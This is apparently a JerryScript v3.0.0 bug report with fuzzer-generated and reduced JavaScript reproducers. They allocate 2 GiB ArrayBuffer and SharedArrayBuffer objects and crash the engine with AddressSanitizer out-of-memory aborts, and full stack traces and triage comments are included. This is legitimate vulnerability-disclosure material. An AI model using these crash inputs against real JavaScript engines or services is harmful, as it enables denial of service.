```javascript
// Unreduced test case from the report. The reduced form given on this page (poc1.js)
// keeps only the SharedArrayBuffer statement, so that is the part tied to the abort:
// a 2147483648-byte (0x80000000, 2 GiB) SharedArrayBuffer followed by .slice().
// The ASan trace printed for poc1.js shows the failed allocation being requested from
// ecma_builtin_arraybuffer_slice, i.e. while creating the buffer that slice() returns.
// `d` and `set` are not declared anywhere in this snippet.
// NOTE(review): statements after the .slice() call are presumably never reached in the
// reported run, because ASan aborts the process at the failed allocation — confirm.
var r = new Int32Array ( 8 ) . sort ( ) ; r = new SharedArrayBuffer ( 2147483648 ) . slice ( 8 ) ; r = new Int32Array ( 128 ) . subarray ( 64 ) . sort ( d ) ; a = new Int32Array . set ( r ) ; var a ; r = r . toString ( r ) ; r . constructor = a ; set ( r ) ; assert ( a === r . toString ( 32 ) ) ;
```
// poc1.js
// Reduced reproducer: slice() with no arguments on a 2147483648-byte (0x80000000)
// SharedArrayBuffer. The trace that follows reports a failed 0x80000000-byte allocation in
// ecma_arraybuffer_allocate_buffer, reached from ecma_builtin_arraybuffer_slice
// (ecma-arraybuffer-object.c:500), so the failing request is for the buffer slice() returns.
// Triage: the report shows an allocator out-of-memory abort, not an out-of-bounds access.
// ASan aborts on a failed allocation by default (see the allocator_may_return_null hint in
// the output).
// NOTE(review): the frame name ecma_arraybuffer_allocate_buffer_throw suggests the engine
// intends to raise an error when allocation fails; whether a non-ASan build does so cleanly
// is not shown here — confirm.
// NOTE(review): the /lib32/libc.so.6 frame suggests a 32-bit jerry binary, where two ~2 GiB
// buffers likely cannot coexist in the address space — confirm against the build steps.
var r = new SharedArrayBuffer ( 2147483648 ) . slice () ;
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc1.js
=================================================================
==2169015==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x80000000 bytes
#0 0x80efe65 in malloc (./jerryscript/build/bin/jerry+0x80efe65)
#1 0x825f11c in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254:10
#2 0x825f11c in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291:24
#3 0x81d5463 in ecma_arraybuffer_allocate_buffer ./jerryscript/jerry-core/ecma/operations/ecma-arraybuffer-object.c:169:28
#4 0x81d7ae3 in ecma_arraybuffer_allocate_buffer_throw ./jerryscript/jerry-core/ecma/operations/ecma-arraybuffer-object.c:195:10
#5 0x81d7ae3 in ecma_builtin_arraybuffer_slice ./jerryscript/jerry-core/ecma/operations/ecma-arraybuffer-object.c:500:7
#6 0x8362abc in ecma_builtin_shared_arraybuffer_prototype_object_slice ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-shared-arraybuffer-prototype.c:104:10
#7 0x8362abc in ecma_builtin_shared_arraybuffer_prototype_dispatch_routine ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-shared-arraybuffer-prototype.inc.h:39:1
#8 0x81b94a4 in ecma_builtin_dispatch_routine ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460:10
#9 0x81b94a4 in ecma_builtin_dispatch_call ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489:12
#10 0x81fb6b7 in ecma_op_function_call_native_built_in ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217:5
#11 0x81fa81c in ecma_op_function_call ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411:16
#12 0x81fa5ce in ecma_op_function_validated_call ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371:10
#13 0x82d7630 in opfunc_call ./jerryscript/jerry-core/vm/vm.c:758:5
#14 0x82d7630 in vm_execute ./jerryscript/jerry-core/vm/vm.c:5217:9
#15 0x82d4f61 in vm_run ./jerryscript/jerry-core/vm/vm.c:5312:10
#16 0x82d4c38 in vm_run_global ./jerryscript/jerry-core/vm/vm.c:286:25
#17 0x812a4e4 in jerry_run ./jerryscript/jerry-core/api/jerryscript.c:548:24
#18 0x83eac3e in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:68:14
#19 0x812162c in main ./jerryscript/jerry-main/main-desktop.c:156:20
#20 0xf7be5ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
==2169015==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: out-of-memory (./jerryscript/build/bin/jerry+0x80efe65) in malloc
==2169015==ABORTING
Test case+
testcase
```javascript
// Unreduced second test case from the report. The reduced form given on this page (poc2.js)
// keeps only: the 2147483648-byte ArrayBuffer, the Uint32Array view over it at byte offset
// `e` (4), and the Int32Array constructed from that Uint32Array.
// The comparison expressions (`a === e`, `false == 0`, ...) and the Uint8Array /
// Uint8ClampedArray statements do not appear in poc2.js.
// NOTE(review): statements after `new Int32Array ( a , e )` are presumably never reached in
// the reported run, because ASan aborts the process at the failed allocation — confirm.
var a = " 32 " ; var e = 4 ; var a = new ArrayBuffer ( 2147483648 , t ) ; Infinity ; var a = new Uint32Array ( a , e ) ; a === e ; new Int32Array ( a , e ) ; a <= e ; a = new Uint8Array ( a ) ; a = new Uint8ClampedArray ( a , e , a ) !== e ; a < e ; a >= e ; a <= e ; 0 == e !== null ; a != e ; a !== e ; false == 0 ; false == undefined === 0 ; var t = a . t ; " " === false ; " " == 0 ; " " === 0 ; false == undefined ; 0 == null ;
```
// poc2.js
// Reduced reproducer: a 2147483648-byte ArrayBuffer, a Uint32Array view over it starting at
// byte offset 4, then an Int32Array constructed from that Uint32Array.
// The trace that follows reports a failed 0x7ffffffc-byte allocation in
// ecma_arraybuffer_allocate_buffer, reached from ecma_typedarray_create_object_with_typedarray
// (ecma-typedarray-object.c:913), i.e. while building a typed array from another typed array.
// 0x7ffffffc equals 2147483648 - 4, consistent with a copy of the view's contents
// (buffer size minus the byte offset `e`).
// Triage: as with poc1.js, the report shows an allocator out-of-memory abort under ASan,
// not an out-of-bounds access.
// NOTE(review): behaviour on a non-ASan build (error raised vs. crash) is not shown — confirm.
var e = 4 ; var a = new ArrayBuffer ( 2147483648 ) ; var a = new Uint32Array ( a , e ) ; new Int32Array ( a , e ) ;
Execution steps & Output+
$ ./jerryscript/build/bin/jerry poc2.js
=================================================================
==2170063==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x7ffffffc bytes
#0 0x80efe65 in malloc (./jerryscript/build/bin/jerry+0x80efe65)
#1 0x825f11c in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254:10
#2 0x825f11c in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291:24
#3 0x81d5463 in ecma_arraybuffer_allocate_buffer ./jerryscript/jerry-core/ecma/operations/ecma-arraybuffer-object.c:169:28
#4 0x82583e0 in ecma_typedarray_create_object_with_typedarray ./jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:913:7
#5 0x82583e0 in ecma_op_create_typedarray ./jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:1679:12
#6 0x81bad21 in ecma_typedarray_helper_dispatch_construct ./jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-helpers.c:60:22
#7 0x81ba8f4 in ecma_builtin_int32array_dispatch_construct ./jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-int32array.c:68:10
#8 0x81b99ce in ecma_builtin_dispatch_construct ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1518:10
#9 0x81fc476 in ecma_op_function_construct_built_in ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1537:28
#10 0x81fc476 in ecma_op_function_construct ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1717:14
#11 0x82d7255 in opfunc_construct ./jerryscript/jerry-core/vm/vm.c:840:7
#12 0x82d7255 in vm_execute ./jerryscript/jerry-core/vm/vm.c:5236:9
#13 0x82d4f61 in vm_run ./jerryscript/jerry-core/vm/vm.c:5312:10
#14 0x82d4c38 in vm_run_global ./jerryscript/jerry-core/vm/vm.c:286:25
#15 0x812a4e4 in jerry_run ./jerryscript/jerry-core/api/jerryscript.c:548:24
#16 0x83eac3e in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:68:14
#17 0x812162c in main ./jerryscript/jerry-main/main-desktop.c:156:20
#18 0xf7c77ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
==2170063==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: out-of-memory (./jerryscript/build/bin/jerry+0x80efe65) in malloc
==2170063==ABORTING
JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7 Version: v3.0.0
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
Test case
testcase
```javascript
var r = new Int32Array ( 8 ) . sort ( ) ; r = new SharedArrayBuffer ( 2147483648 ) . slice ( 8 ) ; r = new Int32Array ( 128 ) . subarray ( 64 ) . sort ( d ) ; a = new Int32Array . set ( r ) ; var a ; r = r . toString ( r ) ; r . constructor = a ; set ( r ) ; assert ( a === r . toString ( 32 ) ) ;
```
Execution steps & Output
Test case+
testcase
```javascript
var a = " 32 " ; var e = 4 ; var a = new ArrayBuffer ( 2147483648 , t ) ; Infinity ; var a = new Uint32Array ( a , e ) ; a === e ; new Int32Array ( a , e ) ; a <= e ; a = new Uint8Array ( a ) ; a = new Uint8ClampedArray ( a , e , a ) !== e ; a < e ; a >= e ; a <= e ; 0 == e !== null ; a != e ; a !== e ; false == 0 ; false == undefined === 0 ; var t = a . t ; " " === false ; " " == 0 ; " " === 0 ; false == undefined ; 0 == null ;
```
Execution steps & Output+
Credits: @Ye0nny, @EJueon of the seclab-yonsei.